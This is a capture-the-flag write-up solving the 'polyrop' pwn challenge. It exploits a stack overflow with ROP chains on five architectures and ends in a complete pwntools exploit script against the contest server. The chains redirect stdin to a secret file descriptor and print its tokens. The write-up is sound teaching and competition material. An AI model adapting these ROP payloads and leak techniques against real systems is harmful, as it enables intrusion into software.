I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time
and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.
Category: pwn
Solver: nh1729
Flag: GPNCTF{you_re_lucky_that_i_scr4pped_one_arch_11dda4}
Writeup
Challenge Setup
This is the hard version of polyrop-warmup. To summarize:
It is a binary exploitation challenge. We get the source of the program to pwn composer.c
and a python wrapper composer.py
. The program prints a menu to either echo back a line or exit.
The program has been compiled for 5 different architectures: s390x
, aarch64
, arm
, riscv64
and x86_64
.
$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
Arch: aarch64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-arm'
Arch: arm-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-riscv64'
Arch: riscv64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-s390x'
Arch: em_s390-64-big
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-x86_64'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
The wrapper starts a QEMU instance with the executable for each arcitecture under a different user. Every line we send is multiplexed to every of these processes. The wrapper then waits for all processes to output something, prints these outputs and accepts new input.
QEMU loads all binaries except the one for aarch64
at static addresses, despite them being PIE.
The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.
Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us.
In contrast to polyrop-warmup, there is no win
function. We have to do proper ROP this time.
Recall there is a buffer overflow in the function that echoes back a user provided line:
static void add_composer(void) {
char buf[0x20];
puts("enter composer:");
int i = 0, c;
while ((c = xgetchar()) != '\n') {
buf[i++] = c;
}
fputs("composer: ", stdout);
puts(buf);
// TODO: add composer to db
}
The while
loop behaves almost exactly like the unsafe gets
function, except that xgetchar
is a custom function that exit
s on EOF
.
Solution
We started with our exploit for polyrop-warmup.
Since we need to build proper ROP chains this time, we debug each architecture individually. For that, we patch the list of architectures in composer.py
and our exploit to include only one and enable gdb
debugging in composer.py
.
We can debug the architecture now by running gdb-multiarch
with the command
target remote localhost:1234
The first architecture we tackled was aarch64
.
aarch64
Architecture basics: This architecture stores the return address not on the stack but in register x30
. Only if a function calls other functions and thus has to destroy x30
, it is saved on the stack. The stack pointer itself is x29
.
First, we automatically search for gadgets and dump all assembly with
ROPgadget --binary composer-aarch64 --offset 0x100000 > gadgets-aarch64.txt # offset is the one Ghidra uses
aarch64-linux-gnu-objdump -d composer-aarch64 > disassembly-aarch64.txt # more searchable than Ghidra
The objdump
command is from the binutils-aarch64-linux-gnu
package.
We can see that the binary uses statically compiled musl as libc. We therefore did not need to leak further addresses for juicy gadgets from there. Instead, we looked for somewhat high-level ones to increase the chances of reuse on other architectures.
To read from file descriptor 42, our first attempt was to use add_composer
by setting the pointer it writes to the address of the file descriptor in the stdin
struct. After that, we could input the byte 42
('*'
) to change the file descriptor. Subsequently, the function would read the token from the new file descriptor.
First, we needed to leak the address of the binary. This is only required for aarch64
due to QEMU. Easy enough, we copied that from our exploit for polyrop-warmup
.
The exploit approach however failed, because add_composer
calls exit
on EOF
. We could thus not return to any gadget to print the data.
The next approach was to use other gadgets to change the file descriptor and read from it as discrete operations.
Using some regexes on the output of ROPGadget
, we found these gadgets:
# loads w0 and x19 from the stack
<__uflow + 0x34>: ldrbw0, [sp, #47]; ldrx19, [sp, #16]; ldpx29, x30, [sp], #48; ret
# stores the value of w0 to an address relative to x19
<__do_global_dtors_aux + 0x50>: strb w0, [x19, #1072]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #32; ret
To find required offsets for the registers and next return addresses, we ran the program with the payload filled with a cyclic pattern (default), stepped through the execution until we were at the gadgets and just like with the return addresses, got the offsets by finding the register values in cyclic.
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
# pwndbg> p &__stdin_FILE.fd
# $3 = (int *) 0x7f112a8d82c0 <__stdin_FILE+120>
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
aarch_rop_offset+0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19
}, length=0x500, word_size=64, endian='little', filler=cyclic())
With print __stdin_FILE
, we confirmed the fd
was changed.
We cannot use add_composer
to read from that file descriptor because it would exit
again.
Therefore we tried to find gadgets to explicitly call getchar
and store the result in some buffer to print later.
Unfortuately, getchar
on this architecture does not seem to store its return address on the stack.
If we return to it by setting register 0x30
, the ret
of the function will jump back to the top, trapping us in an infinite loop of getchar
with no option to output our precious tokens.
We would like to have a gadget that does a proper function call to a register address instead so it sets up 0x30
properly. In searching for these with the regex \tb.*\tx
, we found an even better one:
// __libc_start_init + 0x2c
// Start of interesting bit
ldr x0, [x19], #8
blr x0
cmp x19, x20
b.cc 10cf0 // Jump to start of this gadget
// End of interesting bit
ldp x19, x20, [sp, #16]
ldp x29, x30, [sp], #32
ret
The interesting bit loops from x19
to x20
and calls each address in that array as a function.
Extremely interesting, as we know we can set up x19
easily (and x20
is not much harder).
This single gadget lets us build a “ROP”-chain that does not actually use the return address register x30
to set up the gadgets.
Instead, we can simply create an array of addresses to be called. Some of these functions would be getchar
, while others would store the return value in w0
to a chosen buffer.
While searching for such a gadget, we realized it might not be necessary at all because the characters read in getchar
would also appear in the input buffer of __stdin_FILE
.
# Address start of payload
aarch_stack_base = 0x4000007ff150 # Emperical
aarch_array_offset = 0xb0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
# Fetch token and print it.
0x68: aarch_exe.symbols['main'] - 0x44, # strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset, # value for x19: start of list of functions
0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10, # value for x20: end of list of functions
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [aarch_exe.symbols['getchar']] * 16, # functions to execute: read token
}, length=0x500, word_size=64, endian='little', filler=cyclic())
Stepping through the exploit, we found that the first getchar
already reads the entire token into __stdin_FILE.buf
. We therefore do not need to call it 16 times.
Although at this point it would be fine and safer to make 16 calls, it bloats up our payload with a huge chunk of offsets used. That could complicate things further down the line when we need all payloads to be non-overlapping to combine them for the final payload. So one getchar
it is.
The next step is to print __stdin_FILE.buf
. Luckily, we found a gadget in main
that puts
the buffer from register x22
:
// main+0xa8
mov x0, x22
b 10a5c <main+0x78>
// instruction after jump:
bl 11718 <puts>
main
restores x22
from the stack when ret
urning, giving us full control over it.
The entire exploit for aarch64
is this:
from pwn import *
from ast import literal_eval
archs = ["aarch64"]
r = process('python ./composer.py', shell=True)
def read_response(r):
out = {}
for a in archs:
r.recvuntil(f'{a}: '.encode())
result : bytes = literal_eval(r.recvline().decode())
out[a] = result
return out
read_response(r)
r.sendline(b'1')
read_response(r)
r.sendline(b'A' * 0x28)
A = read_response(r)
aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
# Address start of payload
aarch_stack_base = 0x4000007ff150 # Emperical
aarch_array_offset = 0xb0
payload = flat({
# Change fd of stdin to 42
0x28: aarch_exe.sym['__uflow'] + 0x34, # load w0, x19
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
0x68: aarch_exe.symbols['main'] - 0x44, # store w0 at x19 + 0x430; load x19 (anonymous function)
# Fetch token
0xa0: aarch_stack_base + aarch_array_offset, # value for x19: start of list of functions
0x50: aarch_stack_base + aarch_array_offset + 0x10, # value for x20: end of list of functions
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin.
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [aarch_exe.symbols['getchar'], aarch_exe.symbols['main'] + 0xa8], # functions to execute: prefetch token, go to main for puts
}, length=0x500, word_size=64, endian='little', filler=cyclic())
assert b'\n' not in payload
# send payload
r.sendline(b'1')
read_response(r)
r.sendline(payload)
read_response(r)
# return from main to trigger chain
r.sendline(b'2')
r.interactive()
We can see the token is being printed, together with more garbage from the payload that is still in the buffer.
$ python aarch64_wu.py
[+] Starting local process '/bin/sh': pid 1284212
[!] Did not find any GOT entries
[*] '/.../polyrop/composer-aarch64'
Arch: aarch64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
aarch64: b'e4e4da8d190bb079kaaklaakmaaknaakoaakpaakqaakraaksaaktaakuaakvaakwaakxaakyaakzaalbaalcaaldaaleaalfaalgaalhaaliaaljaalkaallaalmaalnaaloaalpaalqaalraalsaaltaaluaalvaalwaalxaalyaalzaambaamcaamdaameaamfaamgaamhaamiaamjaamkaamlaammaamnaamoaampaamqaamraamsaamtaam\n'
Other architectures
One we had one payload figured out, the others were a lot easier as many similar gadgets are available in the same functions. In this section, we only point out notable features, techniques and gadgets for these architectures and do not cover every detail again. You’ll see in the final exploit script that there is a lot of approximate repetition.
On all architectures, we have the strategy to change __stdin_FILE.fd
, call getchar
and print __stdin_FILE.buf
. Since the payloads are conceptually all the same, we only list them in the final, complete exploit script.
ARM
For arm
, ROPGadget
found only 61 gadgets while the disassembly from objdump
was much more useful.
Unlike aarch64
, arm
pops the return address from the stack. The syntax is slightly unusual as it uses a single instruction, ldmia.w
, to pop many registers at the end of a function, including the program counter as if it was a regular register.
This is the return instruction at the end of main
:
pop {r4, r5, r6, r7, r8, r9, fp, pc}
Working on this architecture, we found this gadget to set the fp
, where ld*
is load from address with offset and st*
is store:
// __fwritex+0x70
ldr r3, [r5, #20]
add r3, r4
str r3, [r5, #20]
ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
No only does it change a value relative to r5
by r4
, it also gives us a ldmia
to set both of them! We had them set from the return of main
in the end, but this gadget is still really powerful as the function is likely to use callee-saved registers in other architectures too.
The remainder of the payload for arm
is almost identical to that of aarch64
. We again used libc_start_init
to call getchar
and a puts
from main
, although classical ROP could have been sufficient as the return address is on the stack.
s390x
ROPGadget
and Ghidra do not support it but objdump
is fine. The return address is in register r14
and the stack pointer in r15
, all numbers are in big endian. The return address is not always put on the stack. Other than that, we pretty much used the same gadgets as in arm
.
Popping from the stack is really cursed in this architecture. Most functions use lmg
(LOAD MULTIPLE) at the end. The manual explains that this instruction pops all registers from one operand to another. It took us some attempts to understand this so here is an example:
lmg %r12,%r15,288(%r15)
// This instruction effectively means:
r12 = *(r15+288+8*0)
r13 = *(r15+288+8*1)
r14 = *(r15+288+8*2)
r15 = *(r15+288+8*3)
The only notable differences in gadgets to arm
are that for the gadget in __fwritex
, we only use the store part as we can control the value to be stored directly, and we set up the first argument register directly and return to puts
as second element of the array of functions.
RISCv64
The return address is stored on the stack. The gadgets are the same as in arm
.
X86_64
We are comfortable enough with this architecture to pop registers rax
and rbx
directly and use a simple mov %rax,0x20(%rbx); add 0x10,%rsp; pop %rbx; ret
to set fd
and use only stack-based return addresses to call all other essential gadgets, without need for the libc_start_init
array.
Putting it all together
Now that we had five payloads that worked on their respective architecture, we still had to combine them into a single payload to solve all at the same time.
Since for that purpose the ROP chains must not overlap, we chose to use simple gadgets that add some value to the stack pointer or, in the case of s390x
directly pop it, to move the actual payload back for each architecture until it does not collide anymore with the other payloads.
These shifts are the ${ARCH}_rop_offset
variables in the exploit below.
We used this snippet to merge the payloads, gather tokens and find the flag. We fill the finished payloads with null bytes and consider a byte relevant to a payload if it is not null.
##########################
##### Merge Payloads #####
##########################
payloads = [
('arm', payload_arm),
('aarch64', payload_aarch64),
('riscv', payload_riscv),
('x86_64', payload_x86_64),
('s390x', payload_s390x),
]
def key(name_payload):
return len(name_payload[1])
maxlen = key(max(payloads, key=key))
for (name, payload) in payloads:
assert b'\n' not in payload, f'Payload for {name} has newlines!'
merged_payload = [0] * maxlen
for i in range(maxlen):
candidates = {}
for (name, payload) in payloads:
if len(payload) > i and payload[i] != 0:
candidates[name] = payload[i]
if len(candidates) > 1:
error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
elif len(candidates) == 1:
merged_payload[i] = candidates.popitem()[1]
for (name, payload) in payloads:
info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))
merged_payload = bytes(merged_payload)
###################
##### Exploit #####
###################
r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')
tokens_raw = read_response(r)
for arch, token in tokens_raw.items():
success(f'Token for {arch}: {token}')
r.sendline(b'magic word')
for a in archs:
r.sendline(tokens_raw[a][:16])
r.interactive()
One final hiccup was that on the remote, the stack pointers are randomized while they were constant on local. We fixed that by extending our leaks at the beginning of the exploits.
Useful resources
Exploit
from pwn import *
from ast import literal_eval
archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = remote("imagine--john-lennon-5061.ctf.kitctf.de", "443", ssl=True)
def read_response(r):
out = {}
for a in archs:
r.recvuntil(f'{a}: '.encode())
result : bytes = literal_eval(r.recvline().decode())
out[a] = result
return out
######### Begin Leak test
# Leak test
# print(read_response(r))
# for i in range(0x10, 0x70, 4):
# print(f'##### {i=:x} #####')
# r.sendline(b'1')
# read_response(r)
# r.sendline(b'A' * i)
# print(read_response(r)['s390x'])
# r.interactive()
######### End Leak test
leaks = {a: bytes(0x20) for a in archs}
len_composer = len(b'composer: ')
read_response(r)
with log.progress("Leaking bytes") as prog:
for i in range(0x20, 0x70):
prog.status(f'{i=} / {0x70}')
r.sendline(b'1')
read_response(r)
r.sendline(b'A' * i)
leaks_ = read_response(r)
for arch, leak in leaks_.items():
leak_byte = leak[len_composer+i:][:1]
if leak_byte == b'\n':
leaks[arch] += b'\0'
else:
leaks[arch] += leak_byte
s390x_stack_base = int.from_bytes(leaks['s390x'][0x68:0x68 + 8].rstrip(b'\n'), 'big') - 0x210
aarch_stack_base = int.from_bytes(leaks['aarch64'][0x20:0x20 + 8].rstrip(b'\n'), 'little') - 0x60
arm_stack_base = int.from_bytes(leaks['arm'][0x24:0x24 + 4].rstrip(b'\n'), 'little') - 0x74
riscv64_stack_base = int.from_bytes(leaks['riscv64'][0x58: 0x58 + 8].rstrip(b'\n'), 'little') - 0xb0
# We do not need a leak for x86_64
success(f'{s390x_stack_base:=x}, {aarch_stack_base:=x}, {arm_stack_base:=x}, {riscv64_stack_base:=x}')
###################
##### AARCH64 #####
###################
aarch_leak = int.from_bytes(leaks['aarch64'][0x28:0x30], 'little')
aarch_main = aarch_leak - 0x7f112a8b6d44 + 0x7f112a8b69e4
aarch_exe = ELF('./composer-aarch64')
aarch_exe.address = aarch_main - aarch_exe.sym['main']
aarch_stdin_fd = aarch_main - 0x7f112a8b69e4 + 0x7f112a8d82c0
aarch_offset_jumps = 7
aarch_rop_offset = 0x60 * aarch_offset_jumps
# Offset of function array from buffer start
aarch_array_offset = 0xb0
payload_aarch64 = flat({
# gdb: b *main+0xfc
# add 0x60 to sp per iteration
**{
0x28 + 0x60 * i: aarch_exe.sym['main'] + 0xe4 for i in range(aarch_offset_jumps)
},
aarch_rop_offset: {
# Change fd of stdin to 42
# ldrb w0, [sp, #47]; ldr x19, [sp, #16]; ldp x29, x30, [sp], #48; ret
0x28: aarch_exe.sym['__uflow'] + 0x34,
0x60+0x2f: bytes([42]), # value for w0
0x70: aarch_stdin_fd - 0x430, # value for x19
# Fetch token and puts it.
# strb w0, [x19, #0x430] ; ldr x19, [sp, #0x10] ; ldp x29, x30, [sp], #0x20 ; ret
0x68: aarch_exe.symbols['main'] - 0x44,
# value for x19: start of list of functions
0xa0: aarch_stack_base + aarch_rop_offset+aarch_array_offset,
# value for x20: end of list of functions
0x50: aarch_stack_base + aarch_rop_offset+aarch_array_offset + 0x10,
0x40: aarch_exe.symbols['ofl_head'] + 0x10 + 8, # value for x22; buf of stdin
0x98: aarch_exe.symbols['libc_start_init']+0x2c, # loop that executes functions
aarch_array_offset: [
aarch_exe.symbols['getchar'], # prefetch token
aarch_exe.symbols['main'] + 0xa8, # puts( x22 )
],
}
}, word_size=64, endian='little', filler=b'\0')
###############
##### ARM #####
###############
arm_exe = ELF('./composer-arm')
arm_exe.address = 0x400000
arm_array_offset = 0x0
arm_stdin_fd = 0x431d6c
arm_stdin_buf = 0x431fac
arm_offset_jumps = 3
arm_rop_offset = 0xc8 * arm_offset_jumps
payload_arm = flat({
# gdb: b *main+0xdc
**{
0x3c + 0xc8 * i: arm_exe.sym['__init_libc'] + 0x11e for i in range(arm_offset_jumps)
},
arm_rop_offset: {
0x2c: 42, # R4
0x30: arm_stdin_fd - 0x14, # R5
# 0x28: 0, # R6
# 0x2c: 0, # R7
# 0x30: 0, # R8
# 0x34: 0, # R9
# 0x38: 0, # R11
# pc # ldr r3, [r5, #20]; add r3, r4; str r3, [r5, #20]; ldmia.w sp!, {r4, r5, r6, r7, r8, pc}
0x3c: arm_exe.sym['__fwritex'] + 0x70,
0x40: arm_rop_offset + arm_array_offset + arm_stack_base, # R4, start of function array
0x44: arm_rop_offset + arm_array_offset + arm_stack_base + 4 * 2, # R5, end of function array
# 0x48: 0, # R6
# 0x4c: 0, # R7
0x50: arm_stdin_buf, # R8, stdin buffer
0x54: arm_exe.sym['libc_start_init'] + 0x14, # pc # call function array
arm_array_offset: [
arm_exe.sym['getchar'], # prefetch token
arm_exe.sym['main'] + 0xa4, # puts( R8 )
],
},
}, word_size=32, endian='little', filler=b'\0')
##################
##### x86_64 #####
##################
x86_64_exe = ELF('./composer-x86_64')
x86_64_exe.address = 0x555555556000
x86_64_stdin_fd = 0x55555555ab78
x86_64_stdin_buf = 0x55555555ab78
x86_64_offset_jumps = 3
x86_64_rop_offset = 0x160 * x86_64_offset_jumps
pop_rax = x86_64_exe.sym['_init'] + 1
pop_rbx = x86_64_exe.sym['__init_tp'] + 0x78
# 0x0000000000101e14 : mov dword ptr [rbx + 0x20], eax ; add rsp, 0x10 ; pop rbx ; ret
mov_gadget = x86_64_exe.sym['static_init_tls'] + 0x1cd
payload_x86_64 = flat({
# gdb: b *main + 0xe7
**{
# add rsp, 0x158 ; ret
0x58 + 0x160 * i: x86_64_exe.sym['__init_libc'] + 0x199 for i in range(x86_64_offset_jumps)
},
0x48: 0x55555555afa8, # r15: stdin buffer
x86_64_rop_offset + 0x58: [
pop_rax,
42, # RAX
pop_rbx,
x86_64_stdin_fd - 0x20, # rbx
mov_gadget,
0, 0, # add rsp, 0x10
0, # RBX
x86_64_exe.sym['getchar'],
x86_64_exe.sym['main'] + 0x63, # mov rdi, r15; call puts
]
}, word_size=64, endian='little', filler=b'\0')
#################
##### s390x #####
#################
s390x_exe = ELF('./composer-s390x')
s390x_exe.address = 0x2aa00000000
s390x_stdin_fd = 0x2aa00004090
s390x_stdin_buf = 0x2aa000042c0
s390x_rop_offset = 0x380
payload_s390x = flat({
# gdb: b *main+0x8c
# R14, pop registers # lmg %r9,%r15,232(%r15); br %r14
0x90: s390x_exe.sym['__libc_start_init'] + 0x96,
0x98: s390x_stack_base + s390x_rop_offset - 0xe8, # R15, saved stack pointer
s390x_rop_offset: {
0x8: s390x_stdin_fd - 40 - 4, # R10
0x10: 42, # R11
# R14 # stg %r11,40(%r10); lmg %r8,%r15,224(%r15); br %r14
0x28: s390x_exe.sym['__fwritex'] + 0x122,
# R15, offsets are such that payload is compact
0x30: s390x_stack_base + s390x_rop_offset - 0x80,
0x60: s390x_stdin_buf, # R8
0x70: s390x_stack_base-0x100, # R10, needs to be read/writeable for this gadget
0x78: s390x_stack_base + s390x_rop_offset + 0xb0, # R11, begin of function array
0x90: s390x_exe.sym['__libc_start_init'] + 0x6c, # R14, call function array
0x98: s390x_stack_base + s390x_rop_offset + 0xb0 - 0xf0, # R15 (stack pointer)
0xb0: [
s390x_exe.sym['getchar'],
s390x_exe.sym['__fwritex'] + 0x118,
],
0xd0: s390x_exe.sym['puts'], # R14
0xd8: s390x_stack_base + s390x_rop_offset, # R15
},
}, word_size=64, endian='big', filler=b'\0')
###################
##### riscv64 #####
###################
riscv64_exe = ELF('./composer-riscv64')
riscv64_exe.address = 0x555555556000
riscv64_stdin_fd = 0x555555559090
riscv64_stdin_buf = 0x555555559368
riscv64_array_offset = 0xb0
riscv64_offset_jumps = 3
riscv64_rop_offset = 0x80 * riscv64_offset_jumps
payload_riscv = flat({
# gdb: b *main+0xe8
**{
# addi sp,sp,128; ret
0x70 + 0x80 * i: riscv64_exe.sym['main'] + 0xce for i in range(riscv64_offset_jumps)
},
riscv64_rop_offset: {
# 0x20: 0, # s9
# 0x28: 0, # s8
# 0x30: 0, # s7
# 0x38: 0, # s6
0x40: riscv64_stdin_buf, # s5, buffer for puts
# 0x48: 0, # s4
# 0x50: 0, # s3
0x58: riscv64_stdin_fd - 0x28, # s2, file descriptor address
# 0x60: 0, # s1
0x68: 42, # FP (s0), file descriptor
# ra # ld a5,40(s2); mv a0,s3; add a5,a5,s0; sd a5,40(s2)
0x70: riscv64_exe.sym['__fwritex'] + 0x8c,
# s0, start of function array
0x98: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset,
# s0, end of function array
0x90: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset + 0x10,
0xa0: riscv64_exe.sym['__libc_start_init'] + 0x24, # call function array
riscv64_array_offset: [
riscv64_exe.sym['getchar'],
riscv64_exe.sym['main'] + 0x7c, # puts ( s5 )
],
},
}, word_size=64, endian='little',filler=b'\0')
##########################
##### Merge Payloads #####
##########################
payloads = [
('arm', payload_arm),
('aarch64', payload_aarch64),
('riscv', payload_riscv),
('x86_64', payload_x86_64),
('s390x', payload_s390x),
]
def key(name_payload):
return len(name_payload[1])
maxlen = key(max(payloads, key=key))
for (name, payload) in payloads:
assert b'\n' not in payload, f'Payload for {name} has newlines!'
merged_payload = [0] * maxlen
for i in range(maxlen):
candidates = {}
for (name, payload) in payloads:
if len(payload) > i and payload[i] != 0:
candidates[name] = payload[i]
if len(candidates) > 1:
error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!', ', '.join(candidates))
elif len(candidates) == 1:
merged_payload[i] = candidates.popitem()[1]
for (name, payload) in payloads:
info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))
merged_payload = bytes(merged_payload)
###################
##### Exploit #####
###################
r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')
tokens_raw = read_response(r)
for arch, token in tokens_raw.items():
success(f'Token for {arch}: {token}')
r.sendline(b'magic word')
for a in archs:
r.sendline(tokens_raw[a][:16])
r.interactive()